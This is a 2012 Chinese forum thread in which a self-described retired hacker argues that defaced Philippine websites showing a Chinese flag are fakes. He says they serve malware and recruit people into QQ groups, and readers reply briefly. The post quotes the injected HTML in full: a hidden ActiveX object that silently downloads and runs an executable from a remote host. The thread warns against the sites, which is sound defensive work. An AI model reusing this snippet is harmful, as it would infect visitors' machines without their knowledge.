---------------------请注意，红客攻击菲官网有猫腻。

慕叶思晨

---------------------请注意，红客攻击菲官网有猫腻。
发表于 2小时前 - 只看楼主
12345[查看评级用户]楼主.字号
笔者是一个引退的老黑客，今天听说菲律宾官方网站被黑，于是进去看了看。​
​
发现http://www.pei.net.ph/​
http://lamitan.gov.ph/  确实被黑了，显示了中国国旗。​
​
疑点1.​
      笔者进行了GOOGLE搜索和百度搜索，发现没有任何搜索引擎以前的收录记录，试想一个国家的网站，访问量应该很大，而且从这个网站运作，应该就被搜索引擎收录过，笔者发现了上次快照更新时间已经是昨天了。那么，一个国家的机要网站，在发现自己被黑后一天都没人处理，难道他们国家没有技术人员了吗？​
​
​疑点2.
      笔者通过查询了源代码和主机地址，发现网站http://lamitan.gov.ph/服务器放置地在美国。​
然后该网站还被挂了马。试想自己黑了给那么多华人看，攻击的人需要挂马害自己人吗，显示这个事情有猫腻。我们查看了源文件，发现了这样一段代码。​
​
<BODY><OBJECT ID="*ActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="*ActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://www.sulu.gov.ph/admin/cal/135pk.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>​
​疑点3.​
      我们下载了这个135pk.exe文件  上传到了查毒网，全部显示为病毒。而且如果是菲律宾官方挂的，也不用自动隐藏下载打开吧，文件有350KB 也不像是什么插件之类的。攻击的网站也不是菲律宾政府官网，而真正的官网应该是：www..gov.ph  ​
​
然后我们在网上查到了.ph的菲律宾域名80元即可注册购买，因此。该事件在没有得到论证以前请没有经验的用户不要去打开。被钓鱼就麻烦了​
​​
以上三个疑点说明  有人故意做了假网站，跟随菲律宾能源网站被黑一事在自己谋利。谋什么利呢 ，为什么被黑的页面写上了当事人的QQ群，是真的希望老外来交流么？我们进群发现群管理不断发内容招人，当笔者提到为什么挂上去的中国红旗的页面代码里含有EXE隐藏下载文件时。笔者被踢出了群。招学员之类的。这个.....不用继续往下说了吧
​
oferry.
本帖最后由 qiaojiaxc 于 2小时前 编辑
QQ截图20120504233204.png (7.26 KB, 下载次数: 0)

2012-5-4 23:29 上传

点击文件名下载附件

金粉中招了。。

神马皆浮云

??
??
??
??
??

藐视天地

  我打开了 中马了么

zzyxz

上去参观过，不会中毒了吧

慕叶思晨

单手摘月 发表于 2012-5-4 19:45
gov.ph可注册？注册几个玩玩

net.ph 。。。

lovecan

虽然看不懂，但是貌似很牛X的样子。

cisco

擦,还好没手贱.

dstwhk

笔者是一个引退的老黑客 .......